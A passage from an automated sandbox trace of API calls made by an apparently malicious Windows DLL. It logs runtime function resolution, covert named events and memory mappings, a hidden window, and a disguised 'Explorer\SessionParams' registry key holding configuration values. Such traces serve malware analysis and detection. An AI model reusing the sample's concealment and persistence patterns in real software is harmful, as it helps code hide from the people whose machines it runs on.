(hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.283] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.283] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.283] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.283] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.283] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.283] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.283] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.283] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.283] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.284] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.284] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.284] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.284] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.284] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.284] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.284] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.284] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x0 [0031.284] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName="97ryuhf023") returned 0x74 [0031.285] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x104, lpName="c745%") returned 0x78 [0031.285] MapViewOfFile (hFileMappingObject=0x78, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2a0000 [0031.285] GetLastError () returned 0x0 [0031.285] SetLastError (dwErrCode=0x0) [0031.285] CreateFileMappingA (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4, lpName="fjg48394") returned 0x7c [0031.285] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b0000 [0031.285] GetLastError () returned 0x0 [0031.285] SetLastError (dwErrCode=0x0) [0031.285] GetLastError () returned 0x0 [0031.285] SetLastError (dwErrCode=0x0) [0031.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.285] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.285] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x72efff7e, lpParameter=0x3026d0, dwCreationFlags=0x4, lpThreadId=0x3026d0 | out: lpThreadId=0x3026d0*=0xac4) returned 0x80 [0031.286] ResumeThread (hThread=0x80) returned 0x1 [0031.286] Entry () [0031.286] GetMessageA (lpMsg=0x12fbb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 25 os_tid = 0xac4 [0031.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.348] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.348] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.349] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.349] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.349] GetCurrentThreadId () returned 0xac4 [0031.349] GetLastError () returned 0x0 [0031.349] SetLastError (dwErrCode=0x0) [0031.349] Sleep (dwMilliseconds=0x2710) [0041.417] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x2a0000, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0041.417] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x15cf9b8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0041.417] GetModuleHandleA (lpModuleName="C:\\Windows\\System32\\goRcteXxZX.exe") returned 0x11d0000 [0041.417] GetLastError () returned 0x0 [0041.417] RegisterClassExA (param_1=0x15cf988) returned 0x70c139 [0041.418] CreateWindowExA (dwExStyle=0x0, lpClassName="zQWwe2esf34356d", lpWindowName="", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72ee0000, lpParam=0x0) returned 0x80114 [0041.496] GetLastError () returned 0x0 [0041.496] SetLastError (dwErrCode=0x0) [0041.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.496] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0041.496] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x72efff7e, lpParameter=0x302b10, dwCreationFlags=0x4, lpThreadId=0x302b10 | out: lpThreadId=0x302b10*=0xecc) returned 0xa0 [0041.497] ResumeThread (hThread=0xa0) returned 0x1 [0041.497] GetLastError () returned 0x0 [0041.497] SetLastError (dwErrCode=0x0) [0041.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.497] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0041.497] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x72efff7e, lpParameter=0x302d30, dwCreationFlags=0x4, lpThreadId=0x302d30 | out: lpThreadId=0x302d30*=0xed0) returned 0xa4 [0041.498] ResumeThread (hThread=0xa4) returned 0x1 [0041.498] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x15cf97c, lpdwDisposition=0x15cf980 | out: phkResult=0x15cf97c*=0xa8, lpdwDisposition=0x15cf980*=0x2) returned 0x0 [0041.498] CloseHandle (hObject=0xa8) returned 1 [0041.498] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0041.498] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x15cf9c8, lpdwDisposition=0x15cfa80 | out: phkResult=0x15cf9c8*=0xac, lpdwDisposition=0x15cfa80*=0x2) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="Timout", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1ed94, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="IsActive", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1ed98, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="BSlp", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1ed9c, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="SDCnt", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eda4, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="LastValue", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eda8, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="Id", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edb8, lpcbData=0x15cf9c4*=0x8 | out: lpType=0x15cf9cc*=0x3, lpData=0x72f1edb8*, lpcbData=0x15cf9c4*=0x8) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="StVal", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edc0, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x15cf9c4*=0x4) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="EmtParam", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edc4, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="HtParam", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edc8, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x15cf9c4*=0x4) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="CMValue", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edcc, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edd0, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x15cf9c4*=0x4) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="IListLen", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eddc, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="IList", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x302f50, lpcbData=0x15cf9c4*=0x200 | out: lpType=0x15cf9cc*=0x0, lpData=0x302f50*=0x0, lpcbData=0x15cf9c4*=0x200) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="Installed", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eef0, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="IPlace", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x300c40, lpcbData=0x15cf9c4*=0x64 | out: lpType=0x15cf9cc*=0x3, lpData=0x300c40*, lpcbData=0x15cf9c4*=0x2) returned 0x0 [0041.499] lstrlenA (lpString=" ") returned 1 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="ISFValue", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1edec, lpcbData=0x15cf9c4*=0x104 | out: lpType=0x15cf9cc*=0x3, lpData=0x72f1edec*, lpcbData=0x15cf9c4*=0x0) returned 0x0 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="LastId", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eef4, lpcbData=0x15cf9c4*=0x8 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x15cf9c4*=0x8) returned 0x2 [0041.499] RegQueryValueExA (in: hKey=0xac, lpValueName="NTries", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eefc, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.500] RegQueryValueExA (in: hKey=0xac, lpValueName="IMValue", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1ef00, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.500] RegQueryValueExA (in: hKey=0xac, lpValueName="LCValue", lpReserved=0x0, lpType=0x15cf9cc, lpData=0x72f1eda0, lpcbData=0x15cf9c4*=0x4 | out: lpType=0x15cf9cc*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x15cf9c4*=0x4) returned 0x2 [0041.500] RegCloseKey (hKey=0xac) returned 0x0 [0041.500] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x15cfa64 | out: phkResult=0x72f1ed90*=0xac, lpdwDisposition=0x15cfa64*=0x2) returned 0x0 [0041.500] RegQueryValueExA (in: hKey=0xac, lpValueName="ISRValue", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x15cfabc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x15cfabc*=0x0) returned 0x0 [0041.500] RegCloseKey (hKey=0xac) returned 0x0 [0041.500] GetMessageA (lpMsg=0x15cfb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 151 os_tid = 0xde8 [0036.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.553] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.553] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.553] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.553] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.553] GetCurrentThreadId () returned 0xde8 Thread: id = 164 os_tid = 0xecc [0041.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.501] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.501] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0041.501] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0041.501] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0041.501] GetCurrentThreadId () returned 0xecc [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetTickCount () returned 0x1973f [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetLastError () returned 0x0 [0041.502] SetLastError (dwErrCode=0x0) [0041.502] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.503] SetLastError (dwErrCode=0x0) [0041.503] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.504] SetLastError (dwErrCode=0x0) [0041.504] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.505] SetLastError (dwErrCode=0x0) [0041.505] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.506] GetLastError () returned 0x0 [0041.506] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.507] GetLastError () returned 0x0 [0041.507] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.508] GetLastError () returned 0x0 [0041.508] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.509] GetLastError () returned 0x0 [0041.509] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.510] SetLastError (dwErrCode=0x0) [0041.510] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.511] SetLastError (dwErrCode=0x0) [0041.511] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError 